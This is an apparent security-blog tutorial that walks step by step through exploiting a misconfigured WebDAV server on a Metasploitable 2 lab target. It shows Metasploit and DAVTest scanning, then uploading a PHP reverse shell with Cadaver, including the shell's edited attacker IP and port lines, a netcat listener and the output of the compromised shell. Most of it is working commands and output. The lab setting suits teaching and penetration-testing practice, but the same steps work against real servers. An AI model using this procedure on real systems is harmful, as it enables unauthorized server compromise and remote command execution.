How to Exploit WebDAV on a Server & Get a Shell

Feb 12, 2020 11:04 PM
Aug 28, 2020 11:21 PM
637027531473656229.jpg

The internet has undoubtedly changed the way we work and communicate. With technological advances, more and more people can collaborate on the web from anywhere in the world. But this remote-friendly environment inherently brings security risks, and hackers are always finding ways to exploit systems for other uses.

WebDAV, or Web Distributed Authoring and Versioning, is a protocol that allows users to remotely collaborate and edit content on the web. It is an extension of HTTP but uses its own distinct features to enhance the standard HTTP methods and headers.

The protocol is mainly used for remote editing and collaboration, but it can also be used to transfer files. It usually runs on port 80 by default, or sometimes port 443 for encrypted communications. While WebDAV offers users the ability and convenience to access web content from anywhere, this same remote function can be a huge security hole if not correctly configured.

In this tutorial, we will be using Metasploitable 2 as our target and Kali Linux as our local machine. You can use a similar setup to follow along if you'd like.

Step 1: Check if WebDAV Is Enabled

The first thing we need to do is check if WebDAV is enabled on the target. Metasploit has a scanner we can use to do so, so fire it up by typing msfconsole in the terminal. Then, we can locate the module using the search command:

msf5 > search webdav

Matching Modules
================

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/dir_webdav_unicode_bypass                           normal     Yes    MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
   1   auxiliary/scanner/http/ms09_020_webdav_unicode_bypass                      normal     Yes    MS09-020 IIS6 WebDAV Unicode Authentication Bypass
   2   auxiliary/scanner/http/webdav_internal_ip                                  normal     Yes    HTTP WebDAV Internal IP Scanner
   3   auxiliary/scanner/http/webdav_scanner                                      normal     Yes    HTTP WebDAV Scanner
   4   auxiliary/scanner/http/webdav_website_content                              normal     Yes    HTTP WebDAV Website Content Scanner
   5   exploit/multi/http/sun_jsws_dav_options                   2010-01-20       great      Yes    Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
   6   exploit/multi/svn/svnserve_date                           2004-05-19       average    No     Subversion Date Svnserve
   7   exploit/osx/browser/safari_file_policy                    2011-10-12       normal     No     Apple Safari file:// Arbitrary Code Execution
   8   exploit/windows/browser/java_ws_arginject_altjvm          2010-04-09       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   9   exploit/windows/browser/java_ws_double_quote              2012-10-16       excellent  No     Sun Java Web Start Double Quote Injection
   10  exploit/windows/browser/java_ws_vmargs                    2012-02-14       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   11  exploit/windows/browser/keyhelp_launchtripane_exec        2012-06-26       excellent  No     KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
   12  exploit/windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      No     Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   13  exploit/windows/browser/ms10_022_ie_vbscript_winhlp32     2010-02-26       great      No     MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
   14  exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec     2010-06-09       excellent  No     Microsoft Help Center XSS and Command Execution
   15  exploit/windows/browser/ms10_046_shortcut_icon_dllloader  2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   16  exploit/windows/browser/oracle_webcenter_checkoutandopen  2013-04-16       excellent  No     Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
   17  exploit/windows/browser/ubisoft_uplay_cmd_exec            2012-07-29       normal     No     Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
   18  exploit/windows/browser/webdav_dll_hijacker               2010-08-18       manual     No     WebDAV Application DLL Hijacker
   19  exploit/windows/http/sap_host_control_cmd_exec            2012-08-14       average    Yes    SAP NetWeaver HostControl Command Injection
   20  exploit/windows/http/xampp_webdav_upload_php              2012-01-14       excellent  No     XAMPP WebDAV PHP Upload
   21  exploit/windows/iis/iis_webdav_scstoragepathfromurl       2017-03-26       manual     Yes     Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   22  exploit/windows/iis/iis_webdav_upload_asp                 2004-12-31       excellent  No     Microsoft IIS WebDAV Write Access Code Execution
   23  exploit/windows/iis/ms03_007_ntdll_webdav                 2003-05-30       great      Yes    MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   24  exploit/windows/local/ms16_016_webdav                     2016-02-09       excellent  Yes    MS16-016 mrxdav.sys WebDav Local Privilege Escalation
   25  exploit/windows/misc/ibm_director_cim_dllinject           2009-03-10       excellent  Yes    IBM System Director Agent DLL Injection
   26  exploit/windows/misc/vmhgfs_webdav_dll_sideload           2016-08-05       normal     No     DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
   27  exploit/windows/misc/webdav_delivery                      1999-01-01       manual     No     Serve DLL via webdav server
   28  exploit/windows/scada/ge_proficy_cimplicity_gefebt        2014-01-23       excellent  Yes    GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
   29  exploit/windows/ssl/ms04_011_pct                          2004-04-13       average    No     MS04-011 Microsoft Private Communications Transport Overflow
   30  post/windows/escalate/droplnk                                              normal     No     Windows Escalate SMB Icon LNK Dropper

We want the webdav_scanner module, so load it with the use command:

msf5 > use auxiliary/scanner/http/webdav_scanner

Now, we can take a look at the options for this module:

msf5 auxiliary(scanner/http/webdav_scanner) > options

Module options (auxiliary/scanner/http/webdav_scanner):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       Path to use
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

We now want to set the path to /dav/, a directory commonly used for WebDAV:

msf5 auxiliary(scanner/http/webdav_scanner) > set path /dav/

path => /dav/

Next, we can set rhosts to the IP address of our target:

msf5 auxiliary(scanner/http/webdav_scanner) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

We should be good to go, so type run to launch the module:

msf5 auxiliary(scanner/http/webdav_scanner) > run

[+] 10.10.0.50 (Apache/2.2.8 (Ubuntu) DAV/2) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The scanner will return some HTTP information, including the Apache version number and whether WebDAV is enabled or not. As we can see above, it is indeed enabled on our target.

Step 2: Test File Permissions with DAVTest

The next thing we'll want to do is test the permissions and file execution policies on the server. Remember, our ultimate goal here is to obtain a reverse shell, so we need to know what we're walking into.

DAVTest is a handy tool that will automatically test these things out for us. Simply type davtest in the terminal to see the help and usage example:

~# davtest

ERROR: Missing -url

/usr/bin/davtest -url <url> [options]

 -auth+     Authorization (user:password)
 -cleanup   delete everything uploaded when done
 -directory+    postfix portion of directory to create
 -debug+    DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
 -move      PUT text files then MOVE to executable
 -nocreate  don't create a directory
 -quiet     only print out summary
 -rand+     use this instead of a random string for filenames
 -sendbd+   send backdoors:
            auto - for any succeeded test
            ext - extension matching file name(s) in backdoors/ dir
 -uploadfile+   upload this file (requires -uploadloc)
 -uploadloc+    upload file to this location/name (requires -uploadfile)
 -url+      url of DAV location

Example: /usr/bin/davtest -url http://localhost/davdir

At the most basic level, all we need to do is provide it with a valid URL pointing to an instance of WebDAV. Naturally, use the -url switch followed by the correct URL.

Here, we can see the tool work its magic. It begins by testing the connection and attempts to create a test directory, which we see is a success. Next, DAVTest will send a variety of different types of files to determine what can be uploaded. It looks like all of these succeed.

~# davtest -url http://10.10.0.50/dav

********************************************************
 Testing DAV connection
OPEN        SUCCEED:        http://10.10.0.50/dav
********************************************************
NOTE    Random string for this session: 6WDIVTY
********************************************************
 Creating directory
MKCOL       SUCCEED:        Created http://10.10.0.50/dav/DavTestDir_6WDIVTY
********************************************************
 Sending test files
PUT asp SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT txt SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT php SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT jhtml   SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT aspx    SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT cgi SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT shtml   SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT cfm SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT html    SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT jsp SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT pl  SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
********************************************************
 Checking for test file execution
EXEC    asp FAIL
EXEC    txt SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
EXEC    php SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
EXEC    jhtml   FAIL
EXEC    aspx    FAIL
EXEC    cgi FAIL
EXEC    shtml   FAIL
EXEC    cfm FAIL
EXEC    html    SUCCEED:    http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
EXEC    jsp FAIL
EXEC    pl  FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.0.50/dav/DavTestDir_6WDIVTY
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html

Toward the end of the output above, we see the good stuff: testing for file execution. We can see that most of them fail, but TXT, HTML, and perhaps the most important for us, PHP files, will all successfully execute. All we need to do now is find a way to upload our shell.

Step 3: Upload the Shell Using Cadaver

For the final stage of our attack, we will use a tool called Cadaver, which offers an intuitive interface for interacting with the WebDAV service — with FTP-like commands that are simple to use.

We can view the help and usage information by typing cadaver -h in the terminal:

~# cadaver -h

Usage: cadaver [OPTIONS] http://hostname[:port]/path
  Port defaults to 80, path defaults to '/'
Options:
  -t, --tolerant            Allow cd/open into non-WebDAV enabled collection.
  -r, --rcfile=FILE         Read script from FILE instead of ~/.cadaverrc.
  -p, --proxy=PROXY[:PORT]  Use proxy host PROXY and optional proxy port PORT.
  -V, --version             Display version information.
  -h, --help                Display this help message.
Please send bug reports and feature requests to <cadaver@webdav.org>

Let's test it out with a harmless text file before we jump to uploading our shell. First, create a simple text file:

root@drd:~# echo 'TESTING' > test.txt

Next, we can connect to WebDAV via Cadaver by supplying the appropriate URL:

~# cadaver http://10.10.0.50/dav

dav:/dav/>

To get a list of available commands, type ? or help at the prompt:

dav:/dav/> ?

Available commands:
 ls         cd         pwd        put        get        mget       mput
 edit       less       mkcol      cat        delete     rmcol      copy
 move       lock       unlock     discover   steal      showlocks  version
 checkin    checkout   uncheckout history    label      propnames  chexec
 propget    propdel    propset    search     set        open       close
 echo       quit       unset      lcd        lls        lpwd       logout
 help       describe   about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye

We can use the put command to upload our test file:

dav:/dav/> put test.txt

Uploading test.txt to `/dav/test.txt':
Progress: [=============================>] 100.0% of 8 bytes succeeded.

Now, if we navigate to it in the browser, we should see the text displayed to us:

637027534852874255.jpg

Since we are now confident that uploading will work, we can quit Cadaver for now so we can get our shell ready:

dav:/dav/> quit

Connection to `10.10.0.50' closed.

Kali contains a variety of shells in the /usr/share/webshells/ directory. We want the PHP reverse shell, so copy it to our current directory with the following command:

~# cp /usr/share/webshells/php/php-reverse-shell.php .

Next, we need to edit a couple of things, so open the file with your favorite text editor and change the IP address to that of our local machine, as well as the port to a port of your choosing:

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.0.1';  // CHANGE THIS
$port = 7777;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Save the file, and set up a listener with Netcat to catch the incoming connection:

~# nc -lvnp 7777

listening on [any] 7777 ...

In a new window or tab, connect to WebDAV again and upload our shell just like we did earlier with the test file:

~# cadaver http://10.10.0.50/dav

dav:/dav/> put php-reverse-shell.php
Uploading php-reverse-shell.php to `/dav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5491 bytes succeeded.

Now browse to the file, and if it's successful, we should see the browser hang:

637027535784279811.jpg

Back on our listener, we should see a connection open up from the target:

connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 54183
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
 14:41:17 up  1:01,  1 user,  load average: 0.12, 0.08, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             13:41    1:00   0.05s  0.05s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: no job control in this shell
sh-3.2$

We can now issue commands like whoami to confirm we have compromised the server:

sh-3.2$ whoami

www-data

From here, we would probably want to upgrade our shell and attempt to escalate privileges to root.

Wrapping Up

In this tutorial, we learned about WebDAV and how to exploit a misconfigured version of it to get shell access. First, we used a Metasploit scanner to determine if WebDAV was running on the target. Next, we were able to test file execution policies with a tool called DAVTest. Finally, we utilized Cadaver to upload a reverse shell and compromise the server. While remote access offers a convenient way to collaborate, hackers will always try to exploit it for their own use.

Cover image by Pixabay/Pexels; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!